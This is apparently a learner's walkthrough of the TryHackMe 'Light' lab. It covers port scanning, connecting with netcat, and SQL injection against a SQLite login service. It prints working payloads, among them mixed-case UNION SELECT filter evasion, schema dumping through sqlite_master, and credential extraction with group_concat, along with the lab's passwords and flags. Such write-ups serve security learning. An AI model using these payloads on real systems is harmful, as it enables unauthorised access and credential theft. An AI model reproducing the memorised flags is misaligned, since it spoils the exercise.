TryHackMe - Light
Light
Test your enumeration skills on this boot-to-root machine.
About
Welcome to the Light database application!
I am working on a database application called Light! Would you like to try it out? If so, the application is running on port 1337. You can connect to it using nc MACHINE_IP 1337 You can use the username smokey in order to get started.
Enumeration
Rustscan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
rustscan -a 10.10.174.222 ─╯
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Port scanning: Because every port has a story to tell.
[~] The config file is expected to be at "/Users/manavallan/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.174.222:22
Open 10.10.174.222:1337
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-23 21:16 IST
Initiating Ping Scan at 21:16
Scanning 10.10.174.222 [2 ports]
Completed Ping Scan at 21:16, 0.15s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:16
Completed Parallel DNS resolution of 1 host. at 21:16, 0.01s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 21:16
Scanning 10.10.174.222 [2 ports]
Discovered open port 1337/tcp on 10.10.174.222
Discovered open port 22/tcp on 10.10.174.222
Completed Connect Scan at 21:16, 0.15s elapsed (2 total ports)
Nmap scan report for 10.10.174.222
Host is up, received conn-refused (0.15s latency).
Scanned at 2025-01-23 21:16:10 IST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
1337/tcp open waste syn-ack
Read data files from: /opt/homebrew/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
nmap -sC -sV -p1337 10.10.227.218 ─╯
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-28 19:42 IST
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Stats: 0:02:37 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.10.227.218
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
| Welcome to the Light database!
| Please enter your username:
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, RTSPRequest:
| Welcome to the Light database!
| Please enter your username: Username not found.
|_ Please enter your username:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.95%I=7%D=1/28%Time=6798E5D5%P=arm-apple-darwin24.1.0%r
SF:(NULL,3B,"Welcome\x20to\x20the\x20Light\x20database!\nPlease\x20enter\x
SF:20your\x20username:\x20")%r(GenericLines,6B,"Welcome\x20to\x20the\x20Li
SF:ght\x20database!\nPlease\x20enter\x20your\x20username:\x20Username\x20n
SF:ot\x20found\.\nPlease\x20enter\x20your\x20username:\x20")%r(GetRequest,
SF:6B,"Welcome\x20to\x20the\x20Light\x20database!\nPlease\x20enter\x20your
SF:\x20username:\x20Username\x20not\x20found\.\nPlease\x20enter\x20your\x2
SF:0username:\x20")%r(HTTPOptions,6B,"Welcome\x20to\x20the\x20Light\x20dat
SF:abase!\nPlease\x20enter\x20your\x20username:\x20Username\x20not\x20foun
SF:d\.\nPlease\x20enter\x20your\x20username:\x20")%r(RTSPRequest,6B,"Welco
SF:me\x20to\x20the\x20Light\x20database!\nPlease\x20enter\x20your\x20usern
SF:ame:\x20Username\x20not\x20found\.\nPlease\x20enter\x20your\x20username
SF::\x20")%r(RPCCheck,3B,"Welcome\x20to\x20the\x20Light\x20database!\nPlea
SF:se\x20enter\x20your\x20username:\x20")%r(DNSVersionBindReqTCP,3B,"Welco
SF:me\x20to\x20the\x20Light\x20database!\nPlease\x20enter\x20your\x20usern
SF:ame:\x20")%r(DNSStatusRequestTCP,3B,"Welcome\x20to\x20the\x20Light\x20d
SF:atabase!\nPlease\x20enter\x20your\x20username:\x20")%r(Help,6B,"Welcome
SF:\x20to\x20the\x20Light\x20database!\nPlease\x20enter\x20your\x20usernam
SF:e:\x20Username\x20not\x20found\.\nPlease\x20enter\x20your\x20username:\
SF:x20")%r(SSLSessionReq,3B,"Welcome\x20to\x20the\x20Light\x20database!\nP
SF:lease\x20enter\x20your\x20username:\x20")%r(TerminalServerCookie,3B,"We
SF:lcome\x20to\x20the\x20Light\x20database!\nPlease\x20enter\x20your\x20us
SF:ername:\x20")%r(TLSSessionReq,3B,"Welcome\x20to\x20the\x20Light\x20data
SF:base!\nPlease\x20enter\x20your\x20username:\x20")%r(Kerberos,3B,"Welcom
SF:e\x20to\x20the\x20Light\x20database!\nPlease\x20enter\x20your\x20userna
SF:me:\x20")%r(SMBProgNeg,3B,"Welcome\x20to\x20the\x20Light\x20database!\n
SF:Please\x20enter\x20your\x20username:\x20")%r(X11Probe,3B,"Welcome\x20to
SF:\x20the\x20Light\x20database!\nPlease\x20enter\x20your\x20username:\x20
SF:")%r(FourOhFourRequest,6B,"Welcome\x20to\x20the\x20Light\x20database!\n
SF:Please\x20enter\x20your\x20username:\x20Username\x20not\x20found\.\nPle
SF:ase\x20enter\x20your\x20username:\x20");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.63 seconds
nc - Netcat
1
2
3
4
─ nc 10.10.174.222 1337 ─╯
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
Trying Bruteforce - Python/Bash Script
For a long time, I was writing a script using python/bash for automating the the nc command read and inputing the username. But I couldn’t succeed. Then as it is a database, started trying some SQLi (I’m pretty new on this manual testing of SQLi). So let’s learn together. This is where my learning in the SQLi in THM comes into play.
SQLi
Validating SQLi
1
2
3
4
5
6
7
8
9
10
Please enter your username: ' OR '1'='1
Password: tF8tj2o94WE4LKC
Please enter your username: ' or 1=1 limit 1 --
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: 1 UNION SELECT 1
Ahh there is a word in there I don't like :(
Please enter your username: '%20or%20'1'='1
Error: unrecognized token: "20or"
Please enter your username: ' or 'SLEEP(5)
Username not found.
So this program detects the -- [Comment], SELECT & UNION , so finding the alternate way to inject.
1
2
Please enter your username: ' OR '1'='1
Password: tF8tj2o94WE4LKC
After some time of grinding found this:
1
2
Please enter your username: 1' UnIoN SeLeCt '1
Password: 1
I have trying multiple payloads, but none seem to get me the table name or schema.
1
2
Please enter your username: 'UnIoN SeLeCt * FrOm information_schema.tables'
Error: no such table: information_schema.tables
Now found the sql version using this command:
1
'Union Select sqlite_version()'
1
2
Please enter your username: 'Union Select sqlite_version()'
Password: 3.31.1
This list of payloads was very much helpful for me: SQLi Payloads Link
1
'Union Select sql FROM sqlite_master'
1
2
3
4
5
Please enter your username: 'Union Select sql FROM sqlite_master'
Password: CREATE TABLE admintable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER)
So found the table name as: admintable and columns as id, username, password
So finally got the query requried for us:
1
2
3
4
5
6
nc 10.10.227.218 1337 ─╯
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
Please enter your username: 'Union Select username from admintable'
Password: TryHackMeAdmin
Flag 1: TryHackMeAdmin
I honestly didn’t think I will get the flag 3, I thought I would receive the flag 2, which is the password. But fortunate me :)
1
2
Please enter your username: ' Union Select password from admintable'
Password: THM{SQLit3_InJ3cTion_is_SimplE_nO?}
Flag 3: THM{SQLit3_InJ3cTion_is_SimplE_nO?}
Now let’s find a way to get the password of TryHackMeAdmin
This didn’t work… ‘ Union Select password from admintable where username=”TryHackMeAdmin”’
After struggling for some time, I thought whether I missed any table name, so took a step back and analyzed my sqlite_master queries
1
'Union Select group_concat(sql) FROM sqlite_master'
group_concat(): This is a SQLite-specific function that concatenates (combines) values from multiple rows into a single string. Each row’s value will be concatenated into one result, separated by a comma by default. It is often used to aggregate data from multiple rows in the database.
In the context of this query:
group_concat(sql)will take all the entries from thesqlcolumn (in thesqlite_mastertable) and concatenate them into one large string. So the two rows in the admintable are printed in the output here.
1
2
3
4
5
6
7
8
Please enter your username: 'Union Select group_concat(sql) FROM sqlite_master'
Password: CREATE TABLE usertable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER),CREATE TABLE admintable (
id INTEGER PRIMARY KEY,
username TEXT,
password INTEGER)
So now I found another table called - usertable Let’s try the previous commands what we tried earlier.
Rabbithole
1
2
3
4
Please enter your username: 'Union Select username from usertable'
Password: alice
Please enter your username: alice
Password: tF8tj2o94WE4LKC
But, whatif we use group_concat to get the contents of the admintable. So the final payload crafted with the help of chatgpt is
1
' Union Select group_concat(username || ":" || password) FROM admintable'
1
2
Please enter your username: ' Union Select group_concat(username || ":" || password) FROM admintable'
Password: TryHackMeAdmin:mamZtAuMlrsEy5bp6q17,flag:THM{SQLit3_InJ3cTion_is_SimplE_nO?}
Finally got it…
Flag 2: mamZtAuMlrsEy5bp6q17
Thanks for reading!